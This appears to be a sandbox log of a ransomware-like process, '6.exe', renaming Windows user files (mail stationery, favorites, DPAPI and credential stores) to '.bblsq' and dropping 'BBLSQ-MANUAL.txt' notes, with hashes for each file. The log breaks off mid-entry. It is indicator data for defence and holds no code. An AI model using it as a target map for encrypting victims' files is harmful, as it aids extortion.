C:\Users\Administrator\Favorites\MSN Websites\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url.bblsq
binary
MD5: 5b84a14545d99d52c003a151ee1e6e32
SHA256: 96913f1a8d40c75f9c1bbd318dbb8b03fe83222200d5543724140f181018fd04
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url.bblsq
binary
MD5: 929b667feedcd0d2d4653f6dff1c3065
SHA256: bd5aa93ed5a02212da0d0676a50544f2adf398a20eb28ba82b806d026bd0a87e
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url.bblsq
binary
MD5: 37df7930ea72b5c87083b16cd8a9cf49
SHA256: a51668ef2172579d55bd3f42274c9c15b6395b32ae402c8e4147acfadd61a899
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url.bblsq
binary
MD5: de018316bf96f1a6571c69fe5a37d37d
SHA256: 0ac00f7f0c1735ccd6bca553cacad7a8df9356982b41ea8874ea84bc18608842
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url.bblsq
binary
MD5: 3c9c8a6bc5d6b17ac5d9facb14f1489a
SHA256: 43534d6b354c36b428108a1e44d3da58661d5fbe5278d295024b4f8879c7a5f7
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url.bblsq
binary
MD5: 24f10820603a60bef7b657e186857467
SHA256: 17ae873526e8ef10026ad8bde8a44d67a9ce8a7057b22fb5d720e2b7cdcffec4
2456
6.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url.bblsq
binary
MD5: e2db168edc98f3477a283ab3cadafb4f
SHA256: 993c1f6106350bfd248796472d192ea31c2faf7c2f99ea3e82ced8e61641b1a2
2456
6.exe
C:\Users\Administrator\Favorites\Links for United States\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Documents\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Favorites\Links\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Downloads\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Pictures\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Videos\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Music\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Favorites\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Desktop\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Contacts\Administrator.contact.bblsq
binary
MD5: 9b810566a50bce4c338b756308b98dc4
SHA256: e769a485a87a9800c867501c3e9a5b5133c8cc2c61aab072dab5a5aa7ee21b0e
2456
6.exe
C:\Users\Administrator\Contacts\Administrator.contact
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred.bblsq
binary
MD5: dd8d6cf9266b8fc5797eceb74c5f84a9
SHA256: a0c13764345127124a2b544d8c86ffa38d7b6764596fd1b4a46d1c8266916dbc
2456
6.exe
C:\Users\Administrator\Contacts\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156.bblsq
binary
MD5: 168125c3f690453c45eadb0c7bb3b8f2
SHA256: 2a8cbe32fcceec8af4e31d18b33b81feacbef5a20f47c95c623af32477dc745c
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST.bblsq
binary
MD5: f70accf04c91b4b0a13096e611f56f43
SHA256: f113740a680a3a639a697c089023d9cdceb83e6048250364b5658ef89ff52bd2
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Credentials\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Identities\{BA2162A3-2F32-4850-8D8C-B3C9A2AA9D43}\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Media Center Programs\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log.bblsq
binary
MD5: fabcdc792d35115bcaaace4e584f6c9b
SHA256: a33bb14e465dc755904f6779f1ef463d14f24fdccba9fd3f5f0879c4a39c0944
2456
6.exe
C:\Users\Administrator\AppData\Roaming\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\LocalLow\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Temp\WPDNSE\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Identities\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp.bblsq
bs
MD5: 7c5b5ade01d37fc480c69d1df9dbe4ac
SHA256: 493bc7c685680493a6b411707855d273605ba0efca87ade6600267a21de8abae
2456
6.exe
C:\Users\Administrator\AppData\Local\Temp\Low\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini.bblsq
binary
MD5: e5226cf09b773f80d859b3cdae7f38b4
SHA256: 063539de4f962bee508fa927562c795df0349d5411e202fe904b25a9a98c0568
2456
6.exe
C:\Users\Administrator\AppData\Local\Temp\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Gadgets\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bblsq
binary
MD5: 060ae391ceffc483977b943cc94bd11b
SHA256: 6973a37e4fa4f534800ed83f4af0da2d063a31a50d58168af80d96e92149e40c
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD.bblsq
binary
MD5: 6aec4b923924bc5f8daecb8327f62c95
SHA256: 7e7ba708c11535f4329bcc1cd9a6aad43978b8a8b9236a01202d33671621d370
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat.bblsq
binary
MD5: 73a867e62200639e2fd31c367f47e252
SHA256: 1a0e5f9550191079fd4f15aa11a1e909e6d8f99ef404520ec3d326862ddc1c9a
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore.bblsq
binary
MD5: 4f11bae3008e87a1236f0ade4bbaa691
SHA256: 953533c67707203bd1f13ebf57ed5aa9995c0c4555c0d3b2baff6a06aba651a1
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif.bblsq
binary
MD5: 353f105456cffa488ee1cff540766c8f
SHA256: 2884e5440535171c5fbad09e39d96b711f7591b024d4574efca079bafc502296
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.bblsq
vc
MD5: 6f0769d7a352eaa9f1ca6445c39973cc
SHA256: 2b2e61a7dfbc065dc7bedc323ae6babde6f5ed634fc7cc5151959861bb428513
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf.bblsq
mp3
MD5: c7352ae84e607d3e437dcdd4ca17d620
SHA256: d9c59aed459a3e4cd355ad22e811c1b8e0a9f43501c2ab8c08144589c2d73313
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif.bblsq
binary
MD5: ffd958c33ac3e4ef4621eedef09d8e9f
SHA256: 85a864f81cfb113343509ecff451cd6116649f7821519abb53eb4556965ff89c
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.bblsq
binary
MD5: 7b258de434737ba789dbde5e6261af38
SHA256: 6de6eecd57db5da0057b8e36af839efa9711556c15e07f38ae898f5001b58a67
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif.bblsq
binary
MD5: 8ab6120112c2dd17041a0e5bbe5a2b5d
SHA256: cc94d1462e8dc6b25d455e9be52ccce3497e9b645fd53f097855eb5cb570ed90
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.bblsq
binary
MD5: 8de5d590a78f55d5b0e5cb28206fa8a9
SHA256: a4f5a788c0dbcbcfd6ce1f745cc13f1400340accf7f84a47a08e8611b2154564
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm.bblsq
binary
MD5: cd3d91f5d1d4db6b4380b1f11e6a79b5
SHA256: 9214986daa7f4f4c0c9737917eb1e0dd45659b11296a348cf99f1e9ad43ea4f2
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.bblsq
binary
MD5: 7b7f516e3711c7a234d8f91d15db1f14
SHA256: ca9fd78198120b8cce60c9756676cbe2e5b3e7cf6b9a11845c537afd2519882b
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm.bblsq
binary
MD5: ff3cae8e05ed0de72556a6f47a4a6d3c
SHA256: 8ac9fc94097f8e05f4c80b8c12df6de23f12ecb612f14600e3f5728c53bf6b7e
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.bblsq
sp
MD5: 68684bc133976cd12de659d79ee8e336
SHA256: d8dcd455c06f0e0a216264d0ec1041b1271f1e41964af34019e61a3c8ae576d8
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf.bblsq
binary
MD5: 36968ed679534086baff2a04393bc107
SHA256: 4056985ca5cfeff5543cd6a8ab46bfbebfd217a4b605da344f1312c02682063d
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.bblsq
binary
MD5: ab40c84372504f9546c9e1288fe480cd
SHA256: f1fc5d3784ed335ee17a57c33763506d651224bd2a3fde2d23193b9649ca03e0
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm.bblsq
binary
MD5: 40c4f56e70cceb96cc611e29439a898e
SHA256: d2857be10e60d500ee12c856504181c146da55e977a94896a213a79e0ff7459c
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf.bblsq
binary
MD5: 125146d5e07cca8711c02a032737ef8d
SHA256: 67ab24f909f2d81eb41381654e1c70483bebd24dd258af6481caa3cddd514fa5
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.bblsq
binary
MD5: 1ffff37d3830c774ff53669e3431d32f
SHA256: fe9d40136d8b3e6e60f2a0b936ab77bcbe0fbd999187af86fc4d016b60a5e451
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.bblsq
binary
MD5: 01343ef4225ee51dce78d8c0b4650635
SHA256: cfbb11a83e154e36e72ffd0601244c522bc841b92662474ed09fb2a4280ed740
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm.bblsq
binary
MD5: ff52cecaf2ef696c050c0988bb256db4
SHA256: 0054dc8f97d41b63bd6cf3526ee6eb0463b83f7ee9c98fd2fb00c768e1cbe1c7
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.bblsq
binary
MD5: 66f74534a171d9d7447af5fd1f307fc3
SHA256: b51d5c0f69893d6376931dfcc6a563daa4d3fdf18965c6401b7ffd100001f8b8
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.bblsq
bas
MD5: d243bca388997260faf2b77bc1866bf2
SHA256: bf26c86206bf1ea180ad4e7958a94d66dd65c2fb1801b0b947102bce3b2f364e
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.bblsq
binary
MD5: 556f96ec6a73ea4c2cf9d0683dedac12
SHA256: 7b82d271d06bc83713738ac1090e7e5305199c5f4a320525ec40f7fdaad6ce92
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.bblsq
binary
MD5: 1ab97ffdb01fe64a684971976c72bacf
SHA256: 35e91d2f873a0fe37bf30f7b43bb1a8fc083bd053c735db8bc54397e40a6f240
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm.bblsq
binary
MD5: 750a7086b6d91537a9127597e502e4a2
SHA256: 4b0ec0eea6e170deb719531222432bc504327c1f5f6c036320f8a602fabe218e
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.bblsq
binary
MD5: 4d1f0022a47fd5868b3410471cf89b9e
SHA256: c571afbc76b81df4965dc3a2423c0c7b654b351cc2e187bb81ea8b6a617bb2c5
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm.bblsq
binary
MD5: 5dbf94d50796ef4c646766f7f83943ed
SHA256: 5aecd2e37de29a51d10cd5adc8af20a05b89877112bcb104a502b3ed63d22f92
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.bblsq
binary
MD5: 00204b99e82ecc764ddb0c35770b0966
SHA256: 0db37c9e4bc70dbd7206250a3e1c2ae82ecfdca2cf111d2fe5a334f2d51fed2c
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf.bblsq
binary
MD5: 10de5aea0c9ee609fa608febfc63a2aa
SHA256: cc44db70cff18a9c1795c88cf2065549bbb3c52a0498dc2ff16dac315140c8f2
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf.bblsq
binary
MD5: 3420bbdb6330c4d098f52e60d1b8cbdb
SHA256: 761f11ca7b810b1e812f143026b0d4d7fa3cbdd6c060728e42de899458ea79f4
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.bblsq
binary
MD5: 7f526b8059cddeb127821203d18ec442
SHA256: 1b57ad3f55b380dd33c68944c196916ec708160cb73ee9cae246207a2f95edc9
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf.bblsq
binary
MD5: 8911996147be2dd6cc886c8bd8af2ee2
SHA256: 375faa4100067a8e8b967f56de747973ec510cc47697d46d6f39f2914467ff82
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.bblsq
binary
MD5: d6f80e71671010ed1ac1f18c7850fc0c
SHA256: a3e09311d7c5712f180b3593dec1c1fa0a0bfd0e37c52b798722289744201218
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm.bblsq
binary
MD5: 6fe4dda7421675b03553a832e34eee5e
